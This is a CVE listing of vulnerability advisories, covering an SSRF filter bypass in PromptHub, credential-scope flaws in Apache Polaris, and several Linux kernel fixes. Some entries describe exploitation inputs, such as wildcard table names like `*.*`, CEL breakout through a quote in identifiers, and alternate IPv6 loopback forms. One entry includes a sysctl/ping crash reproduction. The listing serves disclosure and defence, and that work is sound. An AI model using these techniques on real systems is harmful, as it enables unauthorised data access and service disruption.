| CVE |
Vendors |
Products |
Updated |
CVSS v3.1 |
| Sync-in Server is a secure, open-source platform for file storage, sharing, collaboration, and syncing. Prior to version 2.2.0, the /api/auth/login endpoint contains a logic flaw that allows unauthenticated remote attackers to enumerate valid usernames by measuring the application's response time. This issue has been patched in version 2.2.0. |
| PromptHub is an all-in-one AI toolbox for prompt, skill, and agent management. From version 0.4.9 to before version 0.5.4, apps/web/src/routes/skills.ts exposes an authenticated endpoint POST /api/skills/fetch-remote that fetches a user-supplied URL server-side and reflects the response body (up to 5 MB) back to the caller. The SSRF protection in apps/web/src/utils/remote-http.ts (isPrivateIPv6) attempts to block private/loopback destinations, but multiple alternate-but-valid IPv6 representations bypass the check. The bypasses reach any IPv4 address (loopback, RFC1918, link-local) via IPv4-mapped IPv6 in hex form, and the canonical ::1 via any representation that isn't the literal string "::1". Any authenticated user (role: user or admin) can trigger the SSRF. On deployments configured with ALLOW_REGISTRATION=true — a supported and documented configuration — this means any internet user who can register. This issue has been patched in version 0.5.4. |
| Insertion of Sensitive Information Into Sent Data vulnerability in Saad Iqbal WP EasyPay wp-easy-pay allows Retrieve Embedded Sensitive Data.This issue affects WP EasyPay: from n/a through <= 4.3.0. |
| Grav is a file-based Web platform. Prior to 2.0.0-beta.2, the Login::register() method in the Login plugin accepts attacker-controlled groups and access fields from the registration POST data without server-side validation. When registration is enabled and groups or access are included in the configured allowed fields list, an unauthenticated user can self-register with admin.super privileges by injecting these fields into the registration request. This vulnerability is fixed in 2.0.0-beta.2. |
| WeGIA is a web manager for charitable institutions. In versions prior to 3.6.10, when attempting to upload a file with malicious content to funcionario/docdependente_upload.php, the application responds with an overly descriptive error message. This leads to information disclosure, effectively increasing the attack surface by providing potential attackers with technical insights to refine their exploits. This vulnerability is fixed in 3.6.10. |
| In Apache Iceberg, the table's metadata files are control files: they tell readers
which data files belong to the table and which table version to read.
`write.metadata.path` is an optional table property that tells Polaris
where to
write those metadata files.
For a table already registered in a
Polaris-managed
catalog, changing only that property through an `ALTER TABLE`-style settings
change (not a row-level `INSERT`, `SELECT`, `UPDATE`, or `DELETE`) bypasses
the commit-time branch that is supposed to revalidate storage locations.
The full persisted / credential-vending variant requires the affected
catalog
to have `polaris.config.allow.unstructured.table.location=true`, with
`allowedLocations` broad enough to include the attacker-chosen target.
`allowedLocations` is the admin-configured allowlist of storage paths that
the
catalog is allowed to use. Public project materials suggest that this flag
is a
real supported compatibility / layout mode, not just a contrived lab-only
prerequisite.
In that configuration, a user who can change table settings can cause Apache Polaris
itself to write new table metadata to an attacker-chosen reachable storage
location before the intended location-validation branch runs.
If the later concrete-path validation also accepts that location, Polaris
persists the resulting metadata path into stored table state. Later
table-load
and credential APIs can then return temporary cloud-storage credentials for
the
same location without revalidating it. In plain terms, Polaris can later
hand
out temporary storage access for the same attacker-chosen area.
That attacker-chosen area does not need to be limited to the poisoned
table's
own files. If it is a broader storage prefix, another table's prefix, or,
depending on configuration or provider behavior, even a bucket/container
root,
the resulting disclosure or corruption scope can extend to any data and
metadata Polaris can reach there.
The practical consequences are therefore similar to the staged-create
credential-vending issue already discussed: data and metadata reachable in
that
storage scope can be exposed and, if write-capable credentials are later
issued, modified, corrupted, or removed. Even before that later credential
step, Polaris itself performs the metadata write to the unchecked location.
So the core issue is not only later credential vending.
The primary defect
is
that Polaris skips its intended location checks before performing a
security-
sensitive metadata write when only `write.metadata.path` changes.
When `polaris.config.allow.unstructured.table.location=false`, current code
review suggests the later `updateTableLike(...)` validation usually rejects
out-of-tree metadata locations before the unsafe path is persisted. That may
reduce the persisted / credential-vending variant, but it does not prevent
the
underlying defect: Polaris still skips the intended pre-write location check
when only `write.metadata.path` changes. |
| In plain terms, Apache Polaris is supposed to issue short-lived GCS credentials
that
only work for one table's files, but a crafted namespace or table name can
cause those credentials to work across the configured bucket instead.
Apache Polaris builds Google Cloud Storage downscoped credentials by creating a
Credential Access Boundary (CAB) with CEL conditions that are intended to
restrict access to the requested table's storage path.
The relevant CEL string is built from the bucket name and the table path.
That
table path is derived from namespace and table identifiers. In current code,
that path appears to be inserted into the CEL expression without escaping.
As a result, a namespace or table identifier containing a single quote and
other URI-safe CEL fragments can break out of the intended quoted string and
change the meaning of the CEL condition.
In private testing against Polaris 1.4.0 on real Google Cloud Storage, it was confirmed that Polaris accepted a crafted identifier and returned delegated
GCS
credentials whose CEL path restriction had effectively collapsed.
Those delegated credentials could then:
- list another table's object prefix;
- read another table's metadata control file (Iceberg metadata JSON);
- create and delete an object under another table's object prefix;
- and also list, read, create, and delete objects under an unrelated
external
prefix in the same bucket that was not part of any table path.
That last point is important. The issue is not limited to "another table".
In
the confirmed setup, once Apache Polaris returned credentials for the crafted
table,
the path restriction inside the configured bucket was effectively gone.
The practical effect is that temporary credentials for one crafted table
can be
broader than the table Polaris was asked to authorize, and can become
effectively bucket-wide within the configured bucket.
The current GCS testing used a Polaris principal with broad catalog
privileges for setup. A separate least-privilege Polaris RBAC variant
has not yet been tested on GCS. However, the storage-credential
broadening behavior itself has been confirmed on GCS. |
| Apache Polaris accepts literal `*` characters in namespace and table names. When it
later builds temporary S3 access policies for delegated table access, those
same characters appear to be reused unescaped in S3 IAM resource patterns
and
`s3:prefix` conditions.
In S3 IAM policy matching, `*` is treated as a wildcard rather than as
ordinary text. That means temporary credentials issued for one crafted table
can match the storage path of a different table.
In private testing against Polaris 1.4.0 using Polaris' AWS S3 temporary-
credential path on both MinIO and real AWS S3, credentials returned for
crafted tables such as `f*.t1`, `f*.*`, `*.*`, and `foo.*` could reach other
tables' S3 locations.
The confirmed behavior includes:
- reading another table's metadata control file ([Iceberg metadata JSON]);
- listing another table's exact S3 table prefix ([table prefix]);
- and, when write delegation was returned for the crafted table, creating
and
deleting an object under another table's exact S3 table prefix.
A control case using ordinary different names did not allow the same
cross-table access.
A least-privilege AWS S3 variant was also confirmed in which the attacker
principal had no Polaris permissions on the victim table and only the
minimal permissions required to create and use a crafted wildcard table
(namespace-scoped `TABLE_CREATE` and `TABLE_WRITE_DATA` on `*`). In that
setup, direct Polaris access to `foo.t1` remained forbidden, but the
attacker
could still create and load `*.*`, receive delegated S3 credentials, and use
those credentials to list, read, create, and delete objects under `foo.t1`.
In Iceberg, the metadata JSON file is a control file: it tells readers which
data files belong to the table, which snapshots exist, and which table
version
to read. So unauthorized access to it is already a meaningful
confidentiality
problem. The confirmed write-capable variant means the issue is not limited
to
disclosure. |
| Apache Polaris can issue broad temporary ("vended") storage credentials during
staged
table creation before the effective table location has been validated or
durably reserved.
Those temporary credentials are meant to limit the scope
of
accessible table data and metadata, but this scope limitation becomes
attacker-
directed because the attacker can choose a reachable target location.
In the confirmed variant, if the caller supplies a custom `location` during
stage create and requests credential vending, Apache Polaris uses that location to
construct delegated storage credentials immediately. The stage-create path
itself neither runs the normal location validation nor the overlap checks
before those credentials are issued.
Closely related to that, the staged-create flow also accepts
`write.data.path` / `write.metadata.path` in the request properties and
feeds
those location overrides into the same effective table location set used for
credential vending. Those fields are secondary to the main custom-`location`
exploit, but they are still attacker-influenced location inputs that should
be
validated before any credentials are issued. |
| Issue summary: A timing side-channel which could potentially allow remote
recovery of the private key exists in the SM2 algorithm implementation on 64 bit
ARM platforms.
Impact summary: A timing side-channel in SM2 signature computations on 64 bit
ARM platforms could allow recovering the private key by an attacker..
While remote key recovery over a network was not attempted by the reporter,
timing measurements revealed a timing signal which may allow such an attack.
OpenSSL does not directly support certificates with SM2 keys in TLS, and so
this CVE is not relevant in most TLS contexts. However, given that it is
possible to add support for such certificates via a custom provider, coupled
with the fact that in such a custom provider context the private key may be
recoverable via remote timing measurements, we consider this to be a Moderate
severity issue.
The FIPS modules in 3.5, 3.4, 3.3, 3.2, 3.1 and 3.0 are not affected by this
issue, as SM2 is not an approved algorithm. |
| Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JAXP). Supported versions that are affected are Oracle Java SE: 8u461, 8u461-perf, 11.0.28, 17.0.16, 21.0.8, 25; Oracle GraalVM for JDK: 17.0.16 and 21.0.8; Oracle GraalVM Enterprise Edition: 21.3.15. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N). |
| net-tools is a collection of programs that form the base set of the NET-3 networking distribution for the Linux operating system. Inn versions up to and including 2.10, the Linux network utilities (like ifconfig) from the net-tools package do not properly validate the structure of /proc files when showing interfaces. `get_name()` in `interface.c` copies interface labels from `/proc/net/dev` into a fixed 16-byte stack buffer without bounds checking, leading to possible arbitrary code execution or crash. The known attack path does not require privilege but also does not provide privilege escalation in this scenario. A patch is available and expected to be part of version 2.20. |
| In the Linux kernel, the following vulnerability has been resolved:
ipv6: sr: Fix MAC comparison to be constant-time
To prevent timing attacks, MACs need to be compared in constant time.
Use the appropriate helper function for this. |
| In the Linux kernel, the following vulnerability has been resolved:
net: let net.core.dev_weight always be non-zero
The following problem was encountered during stability test:
(NULL net_device): NAPI poll function process_backlog+0x0/0x530 \
returned 1, exceeding its budget of 0.
------------[ cut here ]------------
list_add double add: new=ffff88905f746f48, prev=ffff88905f746f48, \
next=ffff88905f746e40.
WARNING: CPU: 18 PID: 5462 at lib/list_debug.c:35 \
__list_add_valid_or_report+0xf3/0x130
CPU: 18 UID: 0 PID: 5462 Comm: ping Kdump: loaded Not tainted 6.13.0-rc7+
RIP: 0010:__list_add_valid_or_report+0xf3/0x130
Call Trace:
? __warn+0xcd/0x250
? __list_add_valid_or_report+0xf3/0x130
enqueue_to_backlog+0x923/0x1070
netif_rx_internal+0x92/0x2b0
__netif_rx+0x15/0x170
loopback_xmit+0x2ef/0x450
dev_hard_start_xmit+0x103/0x490
__dev_queue_xmit+0xeac/0x1950
ip_finish_output2+0x6cc/0x1620
ip_output+0x161/0x270
ip_push_pending_frames+0x155/0x1a0
raw_sendmsg+0xe13/0x1550
__sys_sendto+0x3bf/0x4e0
__x64_sys_sendto+0xdc/0x1b0
do_syscall_64+0x5b/0x170
entry_SYSCALL_64_after_hwframe+0x76/0x7e
The reproduction command is as follows:
sysctl -w net.core.dev_weight=0
ping 127.0.0.1
This is because when the napi's weight is set to 0, process_backlog() may
return 0 and clear the NAPI_STATE_SCHED bit of napi->state, causing this
napi to be re-polled in net_rx_action() until __do_softirq() times out.
Since the NAPI_STATE_SCHED bit has been cleared, napi_schedule_rps() can
be retriggered in enqueue_to_backlog(), causing this issue.
Making the napi's weight always non-zero solves this problem.
Triggering this issue requires system-wide admin (setting is
not namespaced). |
| In the Linux kernel, the following vulnerability has been resolved:
bpf: Send signals asynchronously if !preemptible
BPF programs can execute in all kinds of contexts and when a program
running in a non-preemptible context uses the bpf_send_signal() kfunc,
it will cause issues because this kfunc can sleep.
Change `irqs_disabled()` to `!preemptible()`. |
| In the Linux kernel, the following vulnerability has been resolved:
md/md-bitmap: Synchronize bitmap_get_stats() with bitmap lifetime
After commit ec6bb299c7c3 ("md/md-bitmap: add 'sync_size' into struct
md_bitmap_stats"), following panic is reported:
Oops: general protection fault, probably for non-canonical address
RIP: 0010:bitmap_get_stats+0x2b/0xa0
Call Trace:
<TASK>
md_seq_show+0x2d2/0x5b0
seq_read_iter+0x2b9/0x470
seq_read+0x12f/0x180
proc_reg_read+0x57/0xb0
vfs_read+0xf6/0x380
ksys_read+0x6c/0xf0
do_syscall_64+0x82/0x170
entry_SYSCALL_64_after_hwframe+0x76/0x7e
Root cause is that bitmap_get_stats() can be called at anytime if mddev
is still there, even if bitmap is destroyed, or not fully initialized.
Deferenceing bitmap in this case can crash the kernel. Meanwhile, the
above commit start to deferencing bitmap->storage, make the problem
easier to trigger.
Fix the problem by protecting bitmap_get_stats() with bitmap_info.mutex. |
| In the Linux kernel, the following vulnerability has been resolved:
dm thin: make get_first_thin use rcu-safe list first function
The documentation in rculist.h explains the absence of list_empty_rcu()
and cautions programmers against relying on a list_empty() ->
list_first() sequence in RCU safe code. This is because each of these
functions performs its own READ_ONCE() of the list head. This can lead
to a situation where the list_empty() sees a valid list entry, but the
subsequent list_first() sees a different view of list head state after a
modification.
In the case of dm-thin, this author had a production box crash from a GP
fault in the process_deferred_bios path. This function saw a valid list
head in get_first_thin() but when it subsequently dereferenced that and
turned it into a thin_c, it got the inside of the struct pool, since the
list was now empty and referring to itself. The kernel on which this
occurred printed both a warning about a refcount_t being saturated, and
a UBSAN error for an out-of-bounds cpuid access in the queued spinlock,
prior to the fault itself. When the resulting kdump was examined, it
was possible to see another thread patiently waiting in thin_dtr's
synchronize_rcu.
The thin_dtr call managed to pull the thin_c out of the active thins
list (and have it be the last entry in the active_thins list) at just
the wrong moment which lead to this crash.
Fortunately, the fix here is straight forward. Switch get_first_thin()
function to use list_first_or_null_rcu() which performs just a single
READ_ONCE() and returns NULL if the list is already empty.
This was run against the devicemapper test suite's thin-provisioning
suites for delete and suspend and no regressions were observed. |
| In the Linux kernel, the following vulnerability has been resolved:
net_sched: cls_flow: validate TCA_FLOW_RSHIFT attribute
syzbot found that TCA_FLOW_RSHIFT attribute was not validated.
Right shitfing a 32bit integer is undefined for large shift values.
UBSAN: shift-out-of-bounds in net/sched/cls_flow.c:329:23
shift exponent 9445 is too large for 32-bit type 'u32' (aka 'unsigned int')
CPU: 1 UID: 0 PID: 54 Comm: kworker/u8:3 Not tainted 6.13.0-rc3-syzkaller-00180-g4f619d518db9 #0
Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 09/13/2024
Workqueue: ipv6_addrconf addrconf_dad_work
Call Trace:
<TASK>
__dump_stack lib/dump_stack.c:94 [inline]
dump_stack_lvl+0x241/0x360 lib/dump_stack.c:120
ubsan_epilogue lib/ubsan.c:231 [inline]
__ubsan_handle_shift_out_of_bounds+0x3c8/0x420 lib/ubsan.c:468
flow_classify+0x24d5/0x25b0 net/sched/cls_flow.c:329
tc_classify include/net/tc_wrapper.h:197 [inline]
__tcf_classify net/sched/cls_api.c:1771 [inline]
tcf_classify+0x420/0x1160 net/sched/cls_api.c:1867
sfb_classify net/sched/sch_sfb.c:260 [inline]
sfb_enqueue+0x3ad/0x18b0 net/sched/sch_sfb.c:318
dev_qdisc_enqueue+0x4b/0x290 net/core/dev.c:3793
__dev_xmit_skb net/core/dev.c:3889 [inline]
__dev_queue_xmit+0xf0e/0x3f50 net/core/dev.c:4400
dev_queue_xmit include/linux/netdevice.h:3168 [inline]
neigh_hh_output include/net/neighbour.h:523 [inline]
neigh_output include/net/neighbour.h:537 [inline]
ip_finish_output2+0xd41/0x1390 net/ipv4/ip_output.c:236
iptunnel_xmit+0x55d/0x9b0 net/ipv4/ip_tunnel_core.c:82
udp_tunnel_xmit_skb+0x262/0x3b0 net/ipv4/udp_tunnel_core.c:173
geneve_xmit_skb drivers/net/geneve.c:916 [inline]
geneve_xmit+0x21dc/0x2d00 drivers/net/geneve.c:1039
__netdev_start_xmit include/linux/netdevice.h:5002 [inline]
netdev_start_xmit include/linux/netdevice.h:5011 [inline]
xmit_one net/core/dev.c:3590 [inline]
dev_hard_start_xmit+0x27a/0x7d0 net/core/dev.c:3606
__dev_queue_xmit+0x1b73/0x3f50 net/core/dev.c:4434 |
| In the Linux kernel, the following vulnerability has been resolved:
HID: core: Fix assumption that Resolution Multipliers must be in Logical Collections
A report in 2019 by the syzbot fuzzer was found to be connected to two
errors in the HID core associated with Resolution Multipliers. One of
the errors was fixed by commit ea427a222d8b ("HID: core: Fix deadloop
in hid_apply_multiplier."), but the other has not been fixed.
This error arises because hid_apply_multipler() assumes that every
Resolution Multiplier control is contained in a Logical Collection,
i.e., there's no way the routine can ever set multiplier_collection to
NULL. This is in spite of the fact that the function starts with a
big comment saying:
* "The Resolution Multiplier control must be contained in the same
* Logical Collection as the control(s) to which it is to be applied.
...
* If no Logical Collection is
* defined, the Resolution Multiplier is associated with all
* controls in the report."
* HID Usage Table, v1.12, Section 4.3.1, p30
*
* Thus, search from the current collection upwards until we find a
* logical collection...
The comment and the code overlook the possibility that none of the
collections found may be a Logical Collection.
The fix is to set the multiplier_collection pointer to NULL if the
collection found isn't a Logical Collection. |
| In the Linux kernel, the following vulnerability has been resolved:
hrtimers: Handle CPU state correctly on hotplug
Consider a scenario where a CPU transitions from CPUHP_ONLINE to halfway
through a CPU hotunplug down to CPUHP_HRTIMERS_PREPARE, and then back to
CPUHP_ONLINE:
Since hrtimers_prepare_cpu() does not run, cpu_base.hres_active remains set
to 1 throughout. However, during a CPU unplug operation, the tick and the
clockevents are shut down at CPUHP_AP_TICK_DYING. On return to the online
state, for instance CFS incorrectly assumes that the hrtick is already
active, and the chance of the clockevent device to transition to oneshot
mode is also lost forever for the CPU, unless it goes back to a lower state
than CPUHP_HRTIMERS_PREPARE once.
This round-trip reveals another issue; cpu_base.online is not set to 1
after the transition, which appears as a WARN_ON_ONCE in enqueue_hrtimer().
Aside of that, the bulk of the per CPU state is not reset either, which
means there are dangling pointers in the worst case.
Address this by adding a corresponding startup() callback, which resets the
stale per CPU state and sets the online flag.
[ tglx: Make the new callback unconditionally available, remove the online
modification in the prepare() callback and clear the remaining
state in the starting callback instead of the prepare callback ] |